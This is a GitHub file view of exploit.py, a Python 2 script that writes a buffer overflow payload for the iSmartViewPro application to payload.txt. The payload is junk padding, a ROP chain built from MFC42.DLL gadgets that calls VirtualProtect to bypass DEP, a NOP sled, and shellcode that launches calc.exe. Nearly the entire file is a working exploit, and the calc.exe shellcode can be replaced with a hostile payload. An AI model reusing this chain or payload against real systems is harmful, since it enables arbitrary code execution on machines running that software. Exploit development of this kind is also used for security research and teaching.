-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathexploit.py
62 lines (50 loc) · 3.52 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/python
import struct
def p32(x):
return struct.pack('<I', x)
junk = "A" * 272
rop_chain = ""
rop_chain += p32(0x73db4802) # POP EDI # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dd49c8) # "retn" | {PAGE_EXECUTE_READ} [MFC42.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v6.02.4131.0
rop_chain += p32(0x73dce028) # POP ESI # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dd49c8) # "retn" | {PAGE_EXECUTE_READ} [MFC42.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v6.02.4131.0
rop_chain += p32(0x73dc3005) # POP EBP # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dc3005) # Skip 4 bytes from the stack
rop_chain += p32(0x73da3e02) # XOR EAX,EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d38a94) # PUSH EAX # ADD AL,5E # POP EBX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d5ed23) # POP EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0xffffffc0) # -0x40 = 0xffffffc0 => EAX
rop_chain += p32(0x73d9d7e5) # NEG EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dbc1c8) # XCHG EAX,EDX # ADD DH,BH # PUSH ESI # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dce028) # POP ESI # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d3b1cc) # "jmp [eax]" | {PAGE_EXECUTE_READ} [MFC42.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v6.02.4131.0
rop_chain += p32(0x73d5ed23) # POP EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0xfffffd97) # -0x269 = 0xfffffd97 => EAX
rop_chain += p32(0x73d9d7e5) # NEG EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d38a94) # PUSH EAX # ADD AL,5E # POP EBX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d94a07) # POP ECX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x025fd0b0) # lpOldProtect
rop_chain += p32(0x73d5ed23) # POP EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dd62c8) # mfc42 (base + 0x000a62c8) : 0x7c801ad4 (ptr to kernel32.virtualprotect)
rop_chain += p32(0x73d8c36d) # PUSHAD # ADD AL,0 # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d92ecf) # jmp esp | {PAGE_EXECUTE_READ} [MFC42.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v6.02.4131.0
nops = "\x90" * 10
# Badchars: \x00\x0a\x0d
# Shellcode: calc.exe
shellcode = ""
shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
payload = junk + rop_chain + nops + shellcode
print "[+] Creating iSmartViewPro payload of size " + str(len(payload)) + "."
try:
file = open('payload.txt','w');
file.write(payload);
file.close();
print "[+] Payload created successfully."
except:
print "[!] File cannot be created."